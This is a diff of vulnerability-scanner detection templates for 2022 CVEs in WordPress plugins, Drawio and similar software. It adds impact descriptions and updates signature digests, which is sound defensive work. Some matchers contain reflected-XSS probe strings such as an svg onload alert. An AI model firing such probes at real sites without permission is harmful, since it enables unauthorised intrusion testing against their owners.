-# digest: 490a0046304402207abaef976a8134b81d53a146c8cef2a99f1cf36aef1d3009cc3e337fa099fefc02203f8d5b406b8d02b4686b12ac49c76466b9c63f666f9142a0e1b8fbdd70979487:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204698b3d42bf7b2dd5f3bcb41f1ab2485247e34189df68fd037075514dc4a8c3f02203997ba61cde0fc2dd65c2cb4ea871e4daef646f5faa89c6e7462b022b8e078c7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml
index 06bcce1606..b40ec357ff 100644
--- a/http/cves/2022/CVE-2022-1391.yaml
+++ b/http/cves/2022/CVE-2022-1391.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Cab fare calculator WordPress plugin before 1.0.4 does not validate the controller parameter before using it in require statements, which could lead to Local File Inclusion issues.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially exposing sensitive information.
   remediation: |
     Update to the latest version of the WordPress Cab fare calculator plugin (1.0.4) to fix the local file inclusion vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cc1b9e5479c328797cf97111695aec5fb04e81100b66acf09e5e0f0b91cedda902207fb36ba601843060a3c6eeb006419167f6bec539f0354e168c16c2818b31f3f0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022022dde10e744ceb274232ca4dcff943478ed75dd7fcc666a58997355a493ab1a5022100d2c58f9e1bdbf3b9b0fea2349b51c7fd92a2592cbfde9af5bd1de554f424cf6e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml
index 46b1731682..41229910c4 100644
--- a/http/cves/2022/CVE-2022-1392.yaml
+++ b/http/cves/2022/CVE-2022-1392.yaml
@@ -5,6 +5,8 @@ info:
   author: Veshraj
   severity: high
   description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system.
   remediation: |
     Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a2a22279c611df9e2e3c67b242e03b4f9b0cd7fef82243026c3a9452a46e9b4b02206b02d2448c17a559fd2b9f551a71485ffa3a24d4364fc1581313e085be61bea0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200a2d94a108091e1849d9cbb9ece85ba220eb1375a85536fa78a155b99f55a285022100cfd5547a2ecd47e1cd0db540692fe886707f775830f06cf407bce3039c2ab09c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml
index ae9f0a619d..5bb2b23557 100644
--- a/http/cves/2022/CVE-2022-1398.yaml
+++ b/http/cves/2022/CVE-2022-1398.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress External Media without Import plugin through 1.1.2 is susceptible to authenticated blind server-side request forgery. The plugin has no authorization and does not ensure that media added via URLs are external media, which can allow any authenticated users, including subscribers, to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions, access internal resources, and potentially perform further attacks.
   remediation: |
     Upgrade to External Media without Import plugin version 1.1.2 or later.
   reference:
@@ -57,4 +59,4 @@ http:
         part: body_2
         words:
           - external-media-without-import
-# digest: 490a0046304402204562cc04348daa5cb6c817dd9da42261b71be81d3d1f42d9a1c3cf396ba5c4a202207b3d318a3551aa6620cf176c39906a3c071dd4f96c37a2abc8b858b9e95bcf5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b9fa959089c77112aa23899ab29c752b0a8daa29aacc558e12527ebdc31ee07c022100fbf86a1b2b8911a6bd7be37ec47fc89892c662dc3860171318f52742883cf9d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml
index 210d1c6f65..f38d7dedc8 100644
--- a/http/cves/2022/CVE-2022-1439.yaml
+++ b/http/cves/2022/CVE-2022-1439.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210095b1dd163ed26f030fe80cb1ed94854bd42421b7cb099ecebed18c106984c9b7022100f7f0a9c26193e02656f26e29ce713c3d0a4a072f660c174e648b17ae25028aa7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022054b895112a69329e719ba562d04f5219b43de8e11f409ee613a2d7cf6fc6eaa30220505baa0ce1fa7b122b437fdbb61833651153fb93d5fb03f230d0b659ae424a1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml
index f3829119cc..ec52c1ef39 100644
--- a/http/cves/2022/CVE-2022-1442.yaml
+++ b/http/cves/2022/CVE-2022-1442.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Metform plugin through 2.1.3 is susceptible to information disclosure due to improper access control in the ~/core/forms/action.php file. An attacker can view all API keys and secrets of integrated third-party APIs such as that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more.
+  impact: |
+    An attacker can exploit this vulnerability to gain sensitive information from the target system.
   remediation: |
     Upgrade to the latest version of the Metform plugin (>=2.1.4) to fix the information disclosure vulnerability.
   reference:
@@ -65,4 +67,4 @@ http:
         regex:
           - '<option value=\"([0-9]+)\"'
         internal: true
-# digest: 490a004630440220033992cc082544ad30c4f22477336458ba955f551efc89d417c31622d75ca6ff02204247e0b8215acc4b876d32d532b5f9218609725757951e6193a67954899a8b62:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fe1a433681b2bc3c6a4340328d076a2be7bef42f1937722135d0c4824d5cdc4a02210085eed82d99bda7c9ef6fdfc4a18264ae0e61af35cb0d1c6e8e58cbcc20b4e423:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml
index 3f893d126a..bb8f8ab554 100644
--- a/http/cves/2022/CVE-2022-1574.yaml
+++ b/http/cves/2022/CVE-2022-1574.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
+  impact: |
+    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
   remediation: |
     Update to the latest version of the plugin or remove it if not needed.
   reference:
@@ -57,4 +59,4 @@ http:
           - "status_code_2 == 200"
           - "contains(body_2, 'File Upload success')"
         condition: and
-# digest: 4a0a0047304502200277359d98d261ef024efb30cade9e4551fb26b56b6916d268f5eddc46981aad02210093e9145f1863f1f2e059e7a4cefdf0881915c903deb911c94d0cbb0623681cc5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bd1a5c08ee7cfff41d81f95f55c21d88cb07d4ae391154eb33c602549c7c0dbe022100aed229566be8f0bab072e0e52752d0d164dbad991a61338909efa8479664d591:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml
index 9b446b735f..fb2222f75c 100644
--- a/http/cves/2022/CVE-2022-1597.yaml
+++ b/http/cves/2022/CVE-2022-1597.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability.
   reference:
@@ -66,4 +68,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022056ec33c0374ce4842d66306d28c5b59fd460eefcfbaf5d531bad4f20d03362e5022041caa87522debeba3023204294c618ef64eff54512df93d26789893ef3d54a80:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440221008a763c05553d32e1e6c3b75ac6fb819f2a44790239c81d285298cef494c493a1021f0d73c64b807c78af18b55f88f0c1e6986ce0396c9917dd261e6204b958dc60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml
index 89738da7e4..9feda79683 100644
--- a/http/cves/2022/CVE-2022-1598.yaml
+++ b/http/cves/2022/CVE-2022-1598.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress WPQA plugin before 5.5 is susceptible to improper access control. The plugin lacks authentication in a REST API endpoint. An attacker can potentially discover private questions sent between users on the site.
+  impact: |
+    This vulnerability can result in unauthorized access to sensitive information, potentially leading to data breaches or unauthorized actions.
   remediation: |
     Update the WPQA plugin to version 5.5 or later to fix the improper access control issue.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c7963f873b84640c6b163eb8d5b9225954cec4c5aede82987b39dc738f244055022100de0961207ad3f47e4d0493259dd2bd37c4506224f3d128542057ad4db31bb38d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ba9ca0abf5b313b34c4cdc206f8bf0b438f6f3328456d64b663dd70d292c121e022100df67ae57a728e40205925307b3654e951bcd46f566fee31945f9fa2614c2444b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml
index a5cfc67049..cff82641ab 100644
--- a/http/cves/2022/CVE-2022-1609.yaml
+++ b/http/cves/2022/CVE-2022-1609.yaml
@@ -5,6 +5,8 @@ info:
   author: For3stCo1d
   severity: critical
   description: The School Management plugin before version 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade The School Management to version 9.9.7 or later to mitigate this vulnerability.
   reference:
@@ -37,5 +39,4 @@ http:
         part: body
         words:
           - '9061-2202-EVC'
-
-# digest: 490a004630440220106f7b38017ab6613cc6dd880b6e64fe3989606d0efe2995cd80715213505ff702207b8882e9387e708b16ade4fdee42b0d258135f001acff0998023a551a560d2f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202a98b7e0174976e191a04e71881e48f07a034cb46774b11d3b0445404cceea23022100a26fb19a7e3dd51853f7f880e53fa041a936c61ed5942aa51ccd091d7cd7c817:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml
index a26a08220d..92c67774b0 100644
--- a/http/cves/2022/CVE-2022-1713.yaml
+++ b/http/cves/2022/CVE-2022-1713.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.
   remediation: |
     Upgrade Drawio to version 18.0.4 or later to mitigate the SSRF vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
         part: header
         words:
           - "application/octet-stream"
-# digest: 4a0a00473045022100c9fc4c3d80822ecbfd041ba46a0d964a2219a834359a67c7153c785f6c9e5e1b0220465aa6b491a002875927dca3db51983902c0bbdfa0616e2fd1472c543161356d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203853b48f841120d4df4b93e078d4237e7612a579bce046a7a15e8e40f6b6f77502205065a0996c8f7d5f5216770dec592b4f67ca0e3b643b81cb3a5b4c7b5eae228e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml
index bfef69bc1d..c05e8c9352 100644
--- a/http/cves/2022/CVE-2022-1724.yaml
+++ b/http/cves/2022/CVE-2022-1724.yaml
@@ -5,6 +5,8 @@ info:
   author: Akincibor
   severity: medium
   description: WordPress Simple Membership plugin before 4.1.1 contains a reflected cross-site scripting vulnerability. It does not properly sanitize and escape parameters before outputting them back in AJAX actions.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of WordPress Simple Membership plugin (4.1.1 or higher) to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ddef43e505d7d9cf5ede696aeb4507f5f3f7aed61b892bf19a56db1d5fac03a402205108754ca8ae2a2997b964720fb0a69de185b6258cc2e59d974b57d06e183185:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b8fb57210b10c79e5c1ee406174f430a3b0d553268c01227f300f82c155ba79b0221009a2dab86afe16ea5f28c7c5c7de0651a6a1ddc29cdcf285f3b7d9726b503cca9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml
index 232138d69f..b39deaa667 100644
--- a/http/cves/2022/CVE-2022-1756.yaml
+++ b/http/cves/2022/CVE-2022-1756.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below.
+  impact: |
+    Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: Fixed in version 7.4.5
   reference:
     - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072
@@ -46,4 +48,4 @@ http:
           - 'status_code == 200'
           - 'contains(body, "newsletter") && contains(body, "><svg/onload=alert(/document.domain/)>")'
         condition: and
-# digest: 4b0a00483046022100ec7f5598db681641d327bc75e6d3620029aa182e945713798a8264a3c1d9c857022100e98ae15a093a13d3f24642c46f7aa4906d413c8ce25302633a298af61e1f6e64:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b726bae10c8fa3bab22e31d72a170e1e13e1d7e763a8e6cc582c9fc67831a2c202210091922e093c4ef702fce97d906a044d38d7ece2d0fcdd517dfb6a52bcf6763412:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml
index ee4e6777ac..891b2da98f 100644
--- a/http/cves/2022/CVE-2022-1768.yaml
+++ b/http/cves/2022/CVE-2022-1768.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
   remediation: |
     Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability.
   reference:
@@ -59,4 +61,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205456a74050329159a6bf1be26553f92da4661f29f3b106e4d864df52591611d702202278cb6ce51b0135b057f80a887f8442fb730ed3e2f49e5e948fd281eb735013:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203fc6f5a0d22038be182103fd06bdfc0a08abd4d081f160ebdb00d8239681c0ce02200ebee1f60cc3fce6df566ebd6357b376de61970ab1481d9714c2136caa68d0ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml
index 5634e84541..cfa908d3cf 100644
--- a/http/cves/2022/CVE-2022-1815.yaml
+++ b/http/cves/2022/CVE-2022-1815.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio.  An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services.
   remediation: |
     Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
           - "contains(body, 'Interactsh Server')"
           - status_code == 200
         condition: and
-# digest: 4b0a00483046022100fa94156bd6b830cb705756c19e848eeea01ea249f65b418fd2174a4b6cbd98be022100a159a2433fa16738569a5d6803ab597e779c3012c135d81932d9ad6989333e37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a4d3a50798900e3d3623f806ee973e8634591aa5ecdec2a46500cd966310bd55022100bfafd6c36458275c397b4eaeaaf94284805dd55210c8995ea3230c3232bb8aef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml
index 0cc701621a..810d992441 100644
--- a/http/cves/2022/CVE-2022-1883.yaml
+++ b/http/cves/2022/CVE-2022-1883.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Terraboard prior to 2.2.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade Terraboard to version 2.2.0 or later to mitigate the SQL Injection vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205514267346139add363251f5ccab420ac77546e916ace4640ff5f6ae1e15b8a202205bdb21d0d0aefb4eb9def577c7cbd43e13613dbc9126d42f2e1b02abd2187120:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200ce8c09e983cd4324fbde46743320fe2d2575e00a98c2f43ef72c38f4929aaaa02200987fa87128c51bb4ea5576e73d28749ef26d37e830267e62e5fb9920e62287f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml
index 630389802b..34d0ccd9c9 100644
--- a/http/cves/2022/CVE-2022-1903.yaml
+++ b/http/cves/2022/CVE-2022-1903.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
+  impact: |
+    An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system.
   remediation: Fixed in version 3.4.8
   reference:
     - https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ecb8b6530020cce248cd64b39c97b0e13fd2874d0dac4f1ee2240422c4297e5b022100f6435c3179e2c73113b2ddfb84ab6522b371173b0d9650ce76ea488b7dc41cb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d16642eec0006bdb049e8fa943e55e89a4c13aee1cfd5cf044744430819c3a21022100d5d28e43c312f56d3af53a5a1da86ad739c110a564f53279e06d336922238593:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml
index 8be0fa0e62..1574c5b644 100644
--- a/http/cves/2022/CVE-2022-1904.yaml
+++ b/http/cves/2022/CVE-2022-1904.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled.
+  impact: |
+    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
   remediation: |
     Update to the latest version of WordPress Easy Pricing Tables plugin (3.2.1) to mitigate the vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210096e5663934f524f9d3734c770d6c442a85d1fe7f208f25b8b84a2d5ab26740ed022100af667a10762e43f890762433cc6592404884b69fe47cee1a5244dbab5799b7d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b79d1f012fe782a1b03cc9963c2ea36a7b1fc148cd592f99666e95504fb6fa97022100e11abe097e3c5d8ba1ac5de022988eb46658dbbc135f784e8ac5d14b53b50538:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml
index 3873483c42..eecdef876c 100644
--- a/http/cves/2022/CVE-2022-1906.yaml
+++ b/http/cves/2022/CVE-2022-1906.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of WordPress Copyright Proof plugin (>=4.17) which includes proper input sanitization and validation.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206dbeb25bccffccc8a72c2c7bb74234090f8f76f9fba259425df7bb15fc10f02d02201217715ee3162254565ffb2b00752c3b8b86a881b75198128ffa2c561f6eaf45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008d81fde6b09f66203cdb38059d2266705caee8a47b6a667bd158dab2d94c8077022100ad19ed35b66771ceaef3845136b1621956965677ad731d4b46fa9dee9302a42b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml
index e1078eb54e..3d660f248b 100644
--- a/http/cves/2022/CVE-2022-1910.yaml
+++ b/http/cves/2022/CVE-2022-1910.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Shortcodes and Extra Features for Phlox plugin (2.9.8 or higher) to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203e60da3caa65a186dd068f65d0eaecb1e569ea3081b7b17213071dda622cd49b022100d4970ade9a28c054aea7de1169a9b4c62434ca5c21a6fe9be93590e077e227bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100876792f965124688824c14ff8c9c20034a36e0d495b7778086191a94da4374e60220126085a5dcf036acdbbb3d5ee1ab90ddbf41a5c41b7154537c1529c659a126c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml
index 5070fbe033..990651f4f4 100644
--- a/http/cves/2022/CVE-2022-1916.yaml
+++ b/http/cves/2022/CVE-2022-1916.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to version 1.0.5 or later of the WordPress Active Products Tables for WooCommerce plugin to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ae90703c3ecaf2412af57ea7c6de9d8ea4f46b38672eb734b72d18c7dbf65398022039e12adada8f9895f694755b49f5f374d7b70395402cda36d2a6f153eb292970:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022022e36577c38feacb61f3774a1e9458f61aa20f24e0c745cefe1cfd7e36d1378a022100ee22906139d77cb58a0d504fb810b4acd94ec468a13289fc52a5bbb0d7b564cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml
index 73c135a33e..6af3585cd7 100644
--- a/http/cves/2022/CVE-2022-1933.yaml
+++ b/http/cves/2022/CVE-2022-1933.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress CDI plugin prior to 5.1.9 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade WordPress to version 5.1.9 or later to mitigate this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206260769abbc4c07bb23dece1b75293cea51c1219dbdc7a0a1d65ad51918b14c5022100a0a6861cb276460b52ba9724708ca6674cad6356d339dd4ac0f880dbb7166d76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210089b6a79cb8e48cae35b4de312014e8f668f7596a0338f722299a0823649f45da0221008ef927e0fafe6ef085b5126b948ed449d57bae5c028c4bb75c35c5385a4ee839:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml
index d9e7dde627..14d8da8caa 100644
--- a/http/cves/2022/CVE-2022-1937.yaml
+++ b/http/cves/2022/CVE-2022-1937.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Awin Data Feed plugin 1.6 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action, available to both unauthenticated and authenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Awin Data Feed plugin (1.6 or higher) to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
           - 'status_code_2 == 200'
           - contains(body_2, 'colspan=\"2\"><script>alert(document.domain)</script></th>')
         condition: and
-# digest: 4a0a00473045022078e734a1d1047b1fcfb3953de92a4a63f45c1d93e2a1bb74891c8ffb93adc50f0221008dbe77762c5328477aee6684fdd41c6e5621b989f197bfbbdcd2b2f7667ad35d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202034a9122b6db5fb52f22f65ce24f3d5ade152b12cc900f4c2554c47c3ddfdbc02207b4bce6054cc81132ca86a5c95f39480ec2a92ec547183adec1a0c8f240516fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml
index 13b5218237..1a43f360ac 100644
